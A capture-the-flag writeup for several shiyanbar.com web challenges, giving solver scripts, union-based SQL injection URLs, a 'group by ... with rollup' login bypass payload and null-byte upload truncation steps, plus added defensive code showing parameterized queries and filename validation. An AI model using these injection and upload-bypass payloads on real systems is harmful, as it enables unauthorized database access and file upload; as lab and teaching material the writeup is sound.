实验吧 Web challenge writeup

天下武功唯快不破 (speed is everything)

Look at the response headers. Two versions of the solver follow, one with requests and one with urllib.

```python
import requests
import base64


def main():
    url = 'http://ctf5.shiyanbar.com/web/10/10.php'
    # one session so the POST lands in the same PHP session as the GET
    s = requests.session()
    req = s.get(url)
    # the key is base64 in a custom 'flag' response header; the first 25
    # characters of the decoded text are not part of the key
    key = base64.b64decode(req.headers['flag']).decode('utf-8')[25:]
    # print(key)
    # submit straight away, the key is only valid for a short time
    response = s.post(url, data={'key': key})
    print(response.text)


main()
```
```python
from urllib import request, parse
import base64


def main():
    url = 'http://ctf5.shiyanbar.com/web/10/10.php'
    req = request.Request(url)
    # session id taken from the browser; substitute your own
    req.add_header("Cookie", "PHPSESSID=ga0un6plm7tea9li11bgnommh1")
    response = request.urlopen(req)
    # look the 'flag' header up by name instead of relying on its position
    # in getheaders() (the original indexed the fourth header)
    head = response.getheader('flag')
    post = base64.b64decode(head).decode('utf-8')[25:]
    data = parse.urlencode([('key', post)])
    # passing a body turns the same request (same Cookie) into a POST
    response = request.urlopen(req, data.encode('utf-8'))
    print(response.read().decode('utf-8'))


main()
```

这个看起来有点简单! (This looks kind of easy!)

Standard union injection:

```text
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,2
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,database()
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema=database()
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_name="thiskey"
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
```

猫抓老鼠 (cat catches mouse)

Look at the response headers.

content-Pow is not a standard header; submit its value as key and you get the flag.

what a fuck!这是什么鬼东西? (what the hell is this thing?)

JSFuck / jjencode obfuscated JavaScript; decode it.

上传绕过 (upload bypass)

Null-byte (00) truncation bypass. First capture the upload request.

Modify the packet as shown in the figure below.

The '+' corresponds to byte 2b; change it to 00.

Send it and you get the flag.
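What the null byte exploits, and how a server should check the name instead, as an added example that is not part of the original writeup or the challenge's code. It assumes the challenge's upload handler only inspected the trailing extension of the submitted name (an assumption about the challenge), and it uses a constructed sample name `upload.php\x00.jpg`, i.e. the name after the 2b byte has been edited to 00. In PHP versions before 5.3.4 the C-level filesystem call stopped at the first NUL, so the stored name lost everything after it.

```python
import os

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def naive_check(filename):
    """Check only the trailing extension of the submitted string.

    This is the weak check assumed for the challenge: a NUL byte earlier
    in the name is never looked at, so 'x.php\\x00.jpg' is accepted.
    """
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def hardened_check(filename):
    """Reject control bytes first, then judge the name the server would store."""
    # NUL and other control characters have no place in a file name
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return False
    # drop any path component the client may have sent
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or "." not in base:
        return False
    ext = base.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXTENSIONS


def stored_name_after_truncation(filename):
    """Name an old NUL-truncating filesystem layer would actually write."""
    return filename.split("\x00", 1)[0]


def demo():
    # constructed sample: the name after '+' (0x2b) was replaced by 0x00
    crafted = "upload.php\x00.jpg"
    return {
        "naive_accepts": naive_check(crafted),
        "hardened_accepts": hardened_check(crafted),
        "stored_as": stored_name_after_truncation(crafted),
        "hardened_accepts_real_image": hardened_check("photo.jpg"),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened version also renames nothing and trusts nothing from the client beyond the extension; in a real handler you would additionally generate the stored name server-side and verify the file's content type.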

因缺思汀的绕过 ("interesting" bypass)

Right-click and view source; a comment points to source.txt.
It shows that and|select|from|where|union|join|sleep|benchmark are filtered.
Use a group by pwd with rollup query:

```text
' or 1=1 group by pwd with rollup limit 1 offset 2 #
```
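Both injection challenges above (the union injection in 这个看起来有点简单! and the keyword blacklist in 因缺思汀的绕过) come down to the same defect: user input is pasted into the query text. The example below is added here and is not the challenges' code; it stands an in-memory sqlite3 database in for the challenge's MySQL backend (so the MySQL-only `with rollup` clause is not executed, only checked against the blacklist), reuses the table and column names `thiskey`/`k0y` from the page with a placeholder value, and constructs a small `users` table. It shows the concatenated query returning rows it should not, the blacklist from source.txt letting the rollup payload straight through, and the parameterized query treating both payloads as plain values.

```python
import sqlite3


def make_db():
    """Constructed demo schema standing in for the challenge backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE thiskey (id INTEGER, k0y TEXT)")
    conn.execute("INSERT INTO thiskey VALUES (1, 'placeholder-flag')")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-a"), (2, "bob", "pw-b")])
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind index.php?id=: the parameter becomes query text."""
    sql = "SELECT id, name FROM users WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Same lookup with the value bound as a parameter, never parsed as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE id=?",
                        (user_id,)).fetchall()


# the keyword filter source.txt describes, reproduced as a tuple
BLACKLIST = ("and", "select", "from", "where", "union", "join",
             "sleep", "benchmark")


def passes_blacklist(value):
    """True if none of the blacklisted words occur (case-insensitively)."""
    lowered = value.lower()
    return not any(word in lowered for word in BLACKLIST)


def login_parameterized(conn, pwd):
    """A login check that binds the password instead of concatenating it."""
    return conn.execute("SELECT name FROM users WHERE pwd=?",
                        (pwd,)).fetchall()


def demo():
    conn = make_db()
    union_payload = "1 union select 1,k0y from thiskey"
    rollup_payload = "' or 1=1 group by pwd with rollup limit 1 offset 2 #"
    return {
        # concatenation: the union appends a row from another table
        "vulnerable": sorted(lookup_vulnerable(conn, union_payload)),
        # binding: the whole string is compared to id and matches nothing
        "parameterized": lookup_parameterized(conn, union_payload),
        # the blacklist stops the union payload ...
        "union_passes_blacklist": passes_blacklist(union_payload),
        # ... but has nothing to say about group by / with rollup / limit
        "rollup_passes_blacklist": passes_blacklist(rollup_payload),
        # bound as a value, the rollup payload is just a wrong password
        "rollup_login": login_parameterized(conn, rollup_payload),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The blacklist fails for the reason keyword blacklists always fail: the grammar of SQL is far larger than any word list, and the fix is not a longer list but never letting input reach the parser as code.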

后台登录 (backend login)

PHP name -> submit -> flag